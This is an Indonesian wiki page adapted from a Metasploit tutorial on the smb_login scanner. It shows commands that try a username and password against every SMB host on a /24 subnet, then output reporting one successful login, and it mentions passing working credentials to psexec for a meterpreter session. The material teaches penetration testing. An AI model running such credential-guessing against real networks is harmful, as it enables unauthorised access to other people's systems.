MSF: SMB Login cek

From OnnoWiki
Jump to: navigation, search

sumber: https://www.offensive-security.com/metasploit-unleashed/smb-login-check/


Kita bisa mencoba login ke SMB share dengan kombinasi username & password tertentu. Kita juga bisa mencek sekelompok IP address yang mempunyai folder yang di sharing dengan kombinasi username/password tertentu.

Keberhasilan login akan dimasukan ke modul exploit windows/smb/psexec yang dapat digunakan pada sesi meterpreter. 

msf > use auxiliary/scanner/smb/smb_login
msf auxiliary(smb_login) > show options

Opsi modul (auxiliary/scanner/smb/smb_login): 

  Name              Current Setting  Required  Description
  ----              ---------------  --------  -----------
  BLANK_PASSWORDS   true             no        Try blank passwords for all users
  BRUTEFORCE_SPEED  5                yes       How fast to bruteforce, from 0 to 5
  PASS_FILE                          no        File containing passwords, one per line
  PRESERVE_DOMAINS  true             no        Respect a username that contains a domain name.
  RHOSTS                             yes       The target address range or CIDR identifier
  RPORT             445              yes       Set the SMB service port
  SMBDomain         WORKGROUP        no        SMB Domain
  SMBPass                            no        SMB Password
  SMBUser                            no        SMB Username
  STOP_ON_SUCCESS   false            yes       Stop guessing when a credential works for a host
  THREADS           1                yes       The number of concurrent threads
  USERPASS_FILE                      no        File containing users and passwords separated by space, one pair per line
  USER_AS_PASS      true             no        Try the username as the password for all users
  USER_FILE                          no        File containing usernames, one per line
  VERBOSE           true             yes       Whether to print output for all attempts

msf auxiliary(smb_login) > set RHOSTS 192.168.1.0/24
RHOSTS => 192.168.1.0/24
msf auxiliary(smb_login) > set SMBUser victim
SMBUser => victim
msf auxiliary(smb_login) > set SMBPass s3cr3t
SMBPass => s3cr3t
msf auxiliary(smb_login) > set THREADS 50
THREADS => 50
msf auxiliary(smb_login) > run

[*] 192.168.1.100 - FAILED 0xc000006d - STATUS_LOGON_FAILURE
[*] 192.168.1.111 - FAILED 0xc000006d - STATUS_LOGON_FAILURE
[*] 192.168.1.114 - FAILED 0xc000006d - STATUS_LOGON_FAILURE
[*] 192.168.1.125 - FAILED 0xc000006d - STATUS_LOGON_FAILURE
[*] 192.168.1.116 - SUCCESSFUL LOGIN (Unix)
[*] Auxiliary module execution completed

msf auxiliary(smb_login) >




Referensi

Retrieved from "https://lms.onnocenter.or.id/wiki/index.php?title=MSF:_SMB_Login_cek&oldid=47688"